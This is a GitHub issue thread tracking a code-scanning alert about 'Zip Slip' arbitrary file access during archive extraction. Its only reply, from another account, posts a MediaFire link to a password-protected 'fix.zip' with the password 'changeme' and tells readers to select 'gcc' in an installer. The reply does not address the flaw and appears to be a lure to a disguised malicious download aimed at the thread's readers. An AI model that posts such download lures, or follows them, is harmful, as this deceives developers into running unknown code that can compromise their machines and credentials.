### ISSUE TITLE
Fix code scanning alert - Arbitrary file access during archive extraction ("Zip Slip")

### ISSUE THREAD

**Issue by ravindrakmr480** [ravindrakmr480/TechExcel-Accelerate-developer-productivity-with-GitHub-Copilot-and-Dev-Box#5]
Tracking issue for:
- [ ] https://github.com/ravindrakmr480/TechExcel-Accelerate-developer-productivity-with-GitHub-Copilot-and-Dev-Box/security/code-scanning/1

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
